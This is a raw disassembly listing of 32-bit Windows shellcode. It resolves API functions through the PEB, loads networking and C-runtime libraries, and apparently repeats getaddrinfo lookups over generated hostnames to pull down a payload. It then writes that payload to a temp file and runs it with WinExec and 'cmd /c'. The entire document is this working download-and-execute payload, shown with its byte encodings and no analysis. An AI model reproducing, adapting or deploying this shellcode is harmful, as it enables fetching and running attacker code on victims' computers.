0x0        jmp 4                               \xeb\x02                  ..        

     label_0x2:
0x2        jmp 0x7e                            \xeb\x7a                  .z        

     label_0x4:
0x4        call 2                              \xe8\xf9\xff\xff\xff      .....     
0x9        GetProcAddress ; string            \x47\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73          
0x17       db 0xff (!)                        \xff                      .         
0x18       GetTempPathA ; string              \x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41          
0x24       db 0xff (!)                        \xff                      .         
0x25       db 0xff (!)                        \xff                      .         
0x26       db 0xff (!)                        \xff                      .         
0x27       db 0xff (!)                        \xff                      .         
0x28       db 0xff (!)                        \xff                      .         
0x29       db 0xff (!)                        \xff                      .         
0x2a       db 0xff (!)                        \xff                      .         
0x2b       db 0xff (!)                        \xff                      .         
0x2c       WinExec ; string                   \x57\x69\x6e\x45\x78\x65\x63          
0x33       db 0xff (!)                        \xff                      .         
0x34       ExitThread ; string                \x45\x78\x69\x74\x54\x68\x72\x65\x61\x64          
0x3e       db 0xff (!)                        \xff                      .         
0x3f       LoadLibraryA ; string              \x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41          
0x4b       db 0xff (!)                        \xff                      .         
0x4c       ws2_32 ; string                    \x77\x73\x32\x5f\x33\x32            
0x52       db 0xff (!)                        \xff                      .         
0x53       WSAStartup ; string                \x57\x53\x41\x53\x74\x61\x72\x74\x75\x70          
0x5d       db 0xff (!)                        \xff                      .         
0x5e       getaddrinfo ; string               \x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f          
0x69       db 0xff (!)                        \xff                      .         
0x6a       msvcrt ; string                    \x6d\x73\x76\x63\x72\x74            
0x70       db 0xff (!)                        \xff                      .         
0x71       fopen ; string                     \x66\x6f\x70\x65\x6e                
0x76       db 0xff (!)                        \xff                      .         
0x77       fwrite ; string                    \x66\x77\x72\x69\x74\x65            
0x7d       db 0xff (!)                        \xff                      .         
     label_0x7e:
0x7e       jmp 0x93                            \xeb\x13                  ..        

0x80       fclose ; string                    \x66\x63\x6c\x6f\x73\x65            
0x86       db 0xff (!)                        \xff                      .         
0x87       db 0xff (!)                        \xff                      .         
0x88       pop esi                             \x5e                      ^         
0x89       xor ecx, ecx                        \x33\xc9                  3.        
0x8b       mov cl, 0xe4                        \xb1\xe4                  ..        
0x8d       mov edx, ecx                        \x8b\xd1                  ..        
0x8f       sub esp, edx                        \x2b\xe2                  +.        
0x91       mov edi, esp                        \x8b\xfc                  ..        
     label_0x93:
0x93       rep movsb byte ptr es:[edi], byte ptr [esi] \xf3\xa4                  ..        
0x95       xor eax, eax                        \x33\xc0                  3.        
0x97       mov edi, esp                        \x8b\xfc                  ..        
     label_0x99:
0x99       mov al, byte ptr [ecx + edi]        \x8a\x04\x39              ..9       
0x9c       cmp cl, dl                          \x3a\xca                  :.        
0x9e       je 0xad                             \x74\x0d                  t.        

0xa0       cmp al, 0xff                        \x3c\xff                  <.        
0xa2       je 0xa7                             \x74\x03                  t.        

0xa4       inc ecx                             \x41                      A         
0xa5       jmp 0x99                            \xeb\xf2                  ..        

     label_0xa7:
0xa7       mov byte ptr [ecx + edi], ch        \x88\x2c\x39              .,9       
0xaa       inc ecx                             \x41                      A         
0xab       jmp 0x99                            \xeb\xec                  ..        

     label_0xad:
0xad       jmp 0x127                           \xeb\x78                  .x        

     label_0xaf:
0xaf       xor ecx, ecx                        \x31\xc9                  1.        
0xb1       mov esi, dword ptr fs:[ecx + 0x30]  \x64\x8b\x71\x30          d.q0      
0xb5       mov esi, dword ptr [esi + 0xc]      \x8b\x76\x0c              .v.       
0xb8       mov esi, dword ptr [esi + 0x1c]     \x8b\x76\x1c              .v.       
     label_0xbb:
0xbb       mov ebx, dword ptr [esi + 8]        \x8b\x5e\x08              .^.       
0xbe       mov edi, dword ptr [esi + 0x20]     \x8b\x7e\x20              .~        
0xc1       xor ebp, ebp                        \x33\xed                  3.        
0xc3       add ebp, 0x18                       \x83\xc5\x18              ...       
0xc6       mov esi, dword ptr [esi]            \x8b\x36                  .6        
0xc8       cmp word ptr [edi + ebp], cx        \x66\x39\x0c\x2f          f9./      
0xcc       jne 0xbb                            \x75\xed                  u.        

0xce       mov esi, dword ptr [ebx + 0x3c]     \x8b\x73\x3c              .s<       
0xd1       mov esi, dword ptr [esi + ebx + 0x78] \x8b\x74\x1e\x78          .t.x      
0xd5       add esi, ebx                        \x03\xf3                  ..        
0xd7       mov edi, dword ptr [esi + 0x20]     \x8b\x7e\x20              .~        
0xda       add edi, ebx                        \x03\xfb                  ..        
0xdc       mov ecx, dword ptr [esi + 0x14]     \x8b\x4e\x14              .N.       
0xdf       xor ebp, ebp                        \x33\xed                  3.        
0xe1       push esi                            \x56                      V         
     label_0xe2:
0xe2       push edi                            \x57                      W         
0xe3       push ecx                            \x51                      Q         
0xe4       mov edi, dword ptr [edi]            \x8b\x3f                  .?        
0xe6       add edi, ebx                        \x03\xfb                  ..        
0xe8       mov esi, edx                        \x8b\xf2                  ..        
0xea       push 0xe                            \x6a\x0e                  j.        
0xec       pop ecx                             \x59                      Y         
0xed       repe cmpsb byte ptr [esi], byte ptr es:[edi] \xf3\xa6                  ..        
0xef       je 0xf9                             \x74\x08                  t.        

0xf1       pop ecx                             \x59                      Y         
0xf2       pop edi                             \x5f                      _         
0xf3       add edi, 4                          \x83\xc7\x04              ...       
0xf6       inc ebp                             \x45                      E         
0xf7       loop 0xe2                           \xe2\xe9                  ..        
     label_0xf9:
0xf9       pop ecx                             \x59                      Y         
0xfa       pop edi                             \x5f                      _         
0xfb       pop esi                             \x5e                      ^         
0xfc       mov ecx, ebp                        \x8b\xcd                  ..        
0xfe       mov eax, dword ptr [esi + 0x24]     \x8b\x46\x24              .F$       
0x101      add eax, ebx                        \x03\xc3                  ..        
0x103      shl ecx, 1                          \xd1\xe1                  ..        
0x105      add eax, ecx                        \x03\xc1                  ..        
0x107      xor ecx, ecx                        \x33\xc9                  3.        
0x109      mov cx, word ptr [eax]              \x66\x8b\x08              f..       
0x10c      mov eax, dword ptr [esi + 0x1c]     \x8b\x46\x1c              .F.       
0x10f      add eax, ebx                        \x03\xc3                  ..        
0x111      shl ecx, 2                          \xc1\xe1\x02              ...       
0x114      add ecx, eax                        \x03\xc8                  ..        
0x116      mov eax, dword ptr [ecx]            \x8b\x01                  ..        
0x118      add eax, ebx                        \x03\xc3                  ..        
0x11a      mov edi, edx                        \x8b\xfa                  ..        
0x11c      mov esi, edi                        \x8b\xf7                  ..        
0x11e      add esi, 0xe                        \x83\xc6\x0e              ...       
0x121      mov edx, eax                        \x8b\xd0                  ..        
0x123      push 4                              \x6a\x04                  j.        
0x125      pop ecx                             \x59                      Y         
0x126      ret                                 \xc3                      .         

     label_0x127:
0x127      mov edx, esp                        \x8b\xd4                  ..        
0x129      call 0xaf                           \xe8\x81\xff\xff\xff      .....     
0x12e      push eax                            \x50                      P         
0x12f      xor eax, eax                        \x33\xc0                  3.        
0x131      mov al, 0xf                         \xb0\x0f                  ..        
0x133      add edi, eax                        \x03\xf8                  ..        
0x135      push edi                            \x57                      W         
0x136      push ebx                            \x53                      S         
0x137      call edx                            \xff\xd2                  ..        
0x139      push eax                            \x50                      P         
0x13a      xor eax, eax                        \x33\xc0                  3.        
0x13c      mov al, 0x14                        \xb0\x14                  ..        
0x13e      add edi, eax                        \x03\xf8                  ..        
0x140      push edi                            \x57                      W         
0x141      push ebx                            \x53                      S         
0x142      call dword ptr [esp + 0xc]          \xff\x54\x24\x0c          .T$.      
0x146      push eax                            \x50                      P         
0x147      xor eax, eax                        \x33\xc0                  3.        
0x149      mov al, 8                           \xb0\x08                  ..        
0x14b      add edi, eax                        \x03\xf8                  ..        
0x14d      push edi                            \x57                      W         
0x14e      push ebx                            \x53                      S         
0x14f      call dword ptr [esp + 0x10]         \xff\x54\x24\x10          .T$.      
0x153      push eax                            \x50                      P         
0x154      xor eax, eax                        \x33\xc0                  3.        
0x156      mov al, 0xb                         \xb0\x0b                  ..        
0x158      add edi, eax                        \x03\xf8                  ..        
0x15a      push edi                            \x57                      W         
0x15b      push ebx                            \x53                      S         
0x15c      call dword ptr [esp + 0x14]         \xff\x54\x24\x14          .T$.      
0x160      push eax                            \x50                      P         
0x161      mov eax, edi                        \x8b\xc7                  ..        
0x163      add eax, 0xd                        \x83\xc0\x0d              ...       
0x166      push eax                            \x50                      P         
0x167      call dword ptr [esp + 4]            \xff\x54\x24\x04          .T$.      
0x16b      mov ebx, eax                        \x8b\xd8                  ..        
0x16d      xor eax, eax                        \x33\xc0                  3.        
0x16f      mov al, 0x14                        \xb0\x14                  ..        
0x171      add edi, eax                        \x03\xf8                  ..        
0x173      push edi                            \x57                      W         
0x174      push ebx                            \x53                      S         
0x175      call dword ptr [esp + 0x18]         \xff\x54\x24\x18          .T$.      
0x179      push eax                            \x50                      P         
0x17a      xor eax, eax                        \x33\xc0                  3.        
0x17c      mov al, 0xb                         \xb0\x0b                  ..        
0x17e      add edi, eax                        \x03\xf8                  ..        
0x180      push edi                            \x57                      W         
0x181      push ebx                            \x53                      S         
0x182      call dword ptr [esp + 0x1c]         \xff\x54\x24\x1c          .T$.      
0x186      push eax                            \x50                      P         
0x187      add edi, 0xc                        \x83\xc7\x0c              ...       
0x18a      push edi                            \x57                      W         
0x18b      call dword ptr [esp + 0xc]          \xff\x54\x24\x0c          .T$.      
0x18f      mov ebx, eax                        \x8b\xd8                  ..        
0x191      add edi, 7                          \x83\xc7\x07              ...       
0x194      push edi                            \x57                      W         
0x195      push ebx                            \x53                      S         
0x196      call dword ptr [esp + 0x20]         \xff\x54\x24\x20          .T$       
0x19a      push eax                            \x50                      P         
0x19b      add edi, 6                          \x83\xc7\x06              ...       
0x19e      push edi                            \x57                      W         
0x19f      push ebx                            \x53                      S         
0x1a0      call dword ptr [esp + 0x24]         \xff\x54\x24\x24          .T$$      
0x1a4      push eax                            \x50                      P         
0x1a5      push eax                            \x50                      P         
0x1a6      mov esi, esp                        \x8b\xf4                  ..        
0x1a8      add edi, 9                          \x83\xc7\x09              ...       
0x1ab      push edi                            \x57                      W         
0x1ac      push ebx                            \x53                      S         
0x1ad      call dword ptr [esp + 0x2c]         \xff\x54\x24\x2c          .T$,      
0x1b1      push eax                            \x50                      P         
0x1b2      xor eax, eax                        \x33\xc0                  3.        
0x1b4      mov ah, 3                           \xb4\x03                  ..        
0x1b6      sub esp, eax                        \x2b\xe0                  +.        
0x1b8      mov ecx, esp                        \x8b\xcc                  ..        
0x1ba      push ecx                            \x51                      Q         
0x1bb      push eax                            \x50                      P         
0x1bc      call dword ptr [esi + 0x20]         \xff\x56\x20              .V        
0x1bf      add esp, eax                        \x03\xe0                  ..        
0x1c1      pop ecx                             \x59                      Y         
0x1c2      pop ecx                             \x59                      Y         
0x1c3      mov ecx, eax                        \x8b\xc8                  ..        
0x1c5      mov eax, 0x10101ba                  \xb8\xba\x01\x01\x01      .....     
0x1ca      add dword ptr [ebx], ebp            \x01\x2b                  .+        
0x1cc      ret 0xb850                          \xc2\x50\xb8              .P.       

0x1cf      yxo.P+ ; string                    \x79\x78\x6f\x2e\x50\x2b            
0x1d5      db 0xe1 (!)                        \xe1                      .         
0x1d6      db 0x8b (!)                        \x8b                      .         
0x1d7      int3                                \xcc                      .         
0x1d8      xor eax, eax                        \x33\xc0                  3.        
0x1da      mov al, 0x77                        \xb0\x77                  .w        
0x1dc      mov ah, 0x62                        \xb4\x62                  .b        
0x1de      push eax                            \x50                      P         
0x1df      push esp                            \x54                      T         
0x1e0      push ecx                            \x51                      Q         
0x1e1      call dword ptr [esi + 8]            \xff\x56\x08              .V.       
0x1e4      xor edx, edx                        \x33\xd2                  3.        
0x1e6      mov dh, 3                           \xb6\x03                  ..        
0x1e8      mov dl, 0xc                         \xb2\x0c                  ..        
0x1ea      add esp, edx                        \x03\xe2                  ..        
0x1ec      push eax                            \x50                      P         
0x1ed      xor eax, eax                        \x33\xc0                  3.        
0x1ef      mov ah, 5                           \xb4\x05                  ..        
0x1f1      sub esp, eax                        \x2b\xe0                  +.        
0x1f3      push esp                            \x54                      T         
0x1f4      xor eax, eax                        \x33\xc0                  3.        
0x1f6      mov al, 2                           \xb0\x02                  ..        
0x1f8      mov ah, 2                           \xb4\x02                  ..        
0x1fa      push eax                            \x50                      P         
0x1fb      call dword ptr [esi + 0x10]         \xff\x56\x10              .V.       
0x1fe      xor cl, cl                          \x32\xc9                  2.        
     label_0x200:
0x200      push eax                            \x50                      P         
0x201      cmp cl, 0x80                        \x80\xf9\x80              ...       
0x204      je 0x20a                            \x74\x04                  t.        

0x206      inc cl                              \xfe\xc1                  ..        
0x208      jmp 0x200                           \xeb\xf6                  ..        

     label_0x20a:
0x20a      add esp, 0x10                       \x83\xc4\x10              ...       
0x20d      mov al, 6                           \xb0\x06                  ..        
0x20f      push eax                            \x50                      P         
0x210      mov al, 1                           \xb0\x01                  ..        
0x212      push eax                            \x50                      P         
0x213      mov al, 0x17                        \xb0\x17                  ..        
0x215      push eax                            \x50                      P         
0x216      sub esp, 4                          \x83\xec\x04              ...       
0x219      mov ebp, esp                        \x8b\xec                  ..        
0x21b      add edi, 7                          \x83\xc7\x07              ...       
0x21e      sub esp, 0x20                       \x83\xec\x20              ..        
0x221      xor eax, eax                        \x33\xc0                  3.        
     label_0x223:
0x223      mov cl, byte ptr [eax + edi]        \x8a\x0c\x38              ..8       
0x226      mov byte ptr [esp + eax], cl        \x88\x0c\x04              ...       
0x229      inc eax                             \x40                      @         
0x22a      test cl, cl                         \x84\xc9                  ..        
0x22c      jne 0x223                           \x75\xf5                  u.        

0x22e      xor eax, eax                        \x33\xc0                  3.        
0x230      mov ecx, 0x61616161                 \xb9\x61\x61\x61\x61      .aaaa     
0x235      mov ebx, ecx                        \x8b\xd9                  ..        
0x237      push ecx                            \x51                      Q         
     label_0x238:
0x238      mov edx, esp                        \x8b\xd4                  ..        
0x23a      add edx, 0x7f                       \x83\xc2\x7f              ...       
0x23d      push edx                            \x52                      R         
0x23e      xor edx, edx                        \x33\xd2                  3.        
0x240      push ebp                            \x55                      U         
0x241      push edx                            \x52                      R         
0x242      mov edx, esp                        \x8b\xd4                  ..        
0x244      add edx, 0xc                        \x83\xc2\x0c              ...       
0x247      push edx                            \x52                      R         
0x248      call dword ptr [esi + 0xc]          \xff\x56\x0c              .V.       
0x24b      pop ecx                             \x59                      Y         
0x24c      push ecx                            \x51                      Q         
0x24d      test eax, eax                       \x85\xc0                  ..        
0x24f      jne 0x238                           \x75\xe7                  u.        

0x251      xor ebx, ebx                        \x33\xdb                  3.        
0x253      mov bl, 0xee                        \xb3\xee                  ..        
0x255      sub esp, ebx                        \x2b\xe3                  +.        
0x257      push eax                            \x50                      P         
0x258      mov eax, ebp                        \x8b\xc5                  ..        
0x25a      mov eax, dword ptr [eax + 0x5b]     \x8b\x40\x5b              .@[       
     label_0x25d:
0x25d      mov ecx, dword ptr [eax + 0x18]     \x8b\x48\x18              .H.       
0x260      mov edx, dword ptr [eax + 0x1c]     \x8b\x50\x1c              .P.       
0x263      add ecx, 8                          \x83\xc1\x08              ...       
0x266      xor eax, eax                        \x33\xc0                  3.        
0x268      xor edi, edi                        \x33\xff                  3.        
0x26a      mov ax, word ptr [ecx]              \x66\x8b\x01              f..       
0x26d      cmp ax, 0xffff                      \x66\x3d\xff\xff          f=..      
0x271      je 0x2f2                            \x74\x7f                  t.        

0x273      mov edi, eax                        \x8b\xf8                  ..        
0x275      shr edi, 8                          \xc1\xef\x08              ...       
0x278      xor ah, ah                          \x32\xe4                  2.        
0x27a      pop ebx                             \x5b                      [         
0x27b      add edi, ebx                        \x03\xfb                  ..        
0x27d      push edi                            \x57                      W         
0x27e      mov bx, word ptr [ecx + 2]          \x66\x8b\x59\x02          f.Y.      
0x282      mov word ptr [esp + eax + 4], bx    \x66\x89\x5c\x04\x04      f.\..     
0x287      mov edi, dword ptr [ecx + 4]        \x8b\x79\x04              .y.       
0x28a      mov dword ptr [esp + eax + 6], edi  \x89\x7c\x04\x06          .|..      
0x28e      mov edi, dword ptr [ecx + 8]        \x8b\x79\x08              .y.       
0x291      mov dword ptr [esp + eax + 0xa], edi \x89\x7c\x04\x0a          .|..      
0x295      mov edi, dword ptr [ecx + 0xc]      \x8b\x79\x0c              .y.       
0x298      mov dword ptr [esp + eax + 0xe], edi \x89\x7c\x04\x0e          .|..      
0x29c      mov eax, edx                        \x8b\xc2                  ..        
0x29e      test eax, eax                       \x85\xc0                  ..        
0x2a0      jne 0x25d                           \x75\xbb                  u.        

0x2a2      pop eax                             \x58                      X         
0x2a3      push dword ptr [esi - 8]            \xff\x76\xf8              .v.       
0x2a6      push eax                            \x50                      P         
0x2a7      mov al, 1                           \xb0\x01                  ..        
0x2a9      push eax                            \x50                      P         
0x2aa      mov eax, esp                        \x8b\xc4                  ..        
0x2ac      add eax, 0xc                        \x83\xc0\x0c              ...       
0x2af      push eax                            \x50                      P         
0x2b0      call dword ptr [esi + 4]            \xff\x56\x04              .V.       
0x2b3      xor eax, eax                        \x33\xc0                  3.        
0x2b5      mov al, 0xee                        \xb0\xee                  ..        
0x2b7      add esp, eax                        \x03\xe0                  ..        
0x2b9      XXXXX-aaaa ; string                \x58\x58\x58\x58\x58\x2d\x61\x61\x61\x61          
0x2c3      shl ah, 4                           \xc0\xe4\x04              ...       
0x2c6      add al, ah                          \x02\xc4                  ..        
0x2c8      cmp al, 0xff                        \x3c\xff                  <.        
0x2ca      jne 0x2df                           \x75\x13                  u.        

0x2cc      mov ah, al                          \x8a\xe0                  ..        
0x2ce      inc eax                             \x40                      @         
0x2cf      shr eax, 0x10                       \xc1\xe8\x10              ...       
0x2d2      cmp al, 0x1a                        \x3c\x1a                  <.        
0x2d4      jne 0x2da                           \x75\x04                  u.        

0x2d6      inc ah                              \xfe\xc4                  ..        
0x2d8      xor al, al                          \x32\xc0                  2.        
     label_0x2da:
0x2da      shl eax, 0x10                       \xc1\xe0\x10              ...       
0x2dd      jmp 0x2e7                           \xeb\x08                  ..        

     label_0x2df:
0x2df      inc eax                             \x40                      @         
0x2e0      mov ah, al                          \x8a\xe0                  ..        
0x2e2      shr ah, 4                           \xc0\xec\x04              ...       
0x2e5      and al, 0xf                         \x24\x0f                  $.        
     label_0x2e7:
0x2e7      db 0x05                             \x05                      .         
0x2e8      aaaaP ; string                     \x61\x61\x61\x61\x50                
0x2ed      jmp 0x238                           \xe9\x46\xff\xff\xff      .F...     

     label_0x2f2:
0x2f2      mov eax, dword ptr [esi - 8]        \x8b\x46\xf8              .F.       
0x2f5      push eax                            \x50                      P         
0x2f6      call dword ptr [esi - 4]            \xff\x56\xfc              .V.       
0x2f9      mov ax, 0x522                       \x66\xb8\x22\x05          f.".      
0x2fd      add esp, eax                        \x03\xe0                  ..        
0x2ff      h/c "hcmd  ; string                \x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20          
0x309      mov ecx, esp                        \x8b\xcc                  ..        
     label_0x30b:
0x30b      inc ecx                             \x41                      A         
0x30c      mov al, byte ptr [ecx]              \x8a\x01                  ..        
0x30e      test al, al                         \x84\xc0                  ..        
0x310      jne 0x30b                           \x75\xf9                  u.        

0x312      mov byte ptr [ecx], 0x22            \xc6\x01\x22              .."       
0x315      mov byte ptr [ecx + 1], al          \x88\x41\x01              .A.       
0x318      xor eax, eax                        \x33\xc0                  3.        
0x31a      mov ecx, esp                        \x8b\xcc                  ..        
0x31c      push eax                            \x50                      P         
0x31d      push ecx                            \x51                      Q         
0x31e      call dword ptr [esi + 0x1c]         \xff\x56\x1c              .V.       
0x321      push eax                            \x50                      P         
0x322      call dword ptr [esi + 0x18]         \xff\x56\x18              .V.       
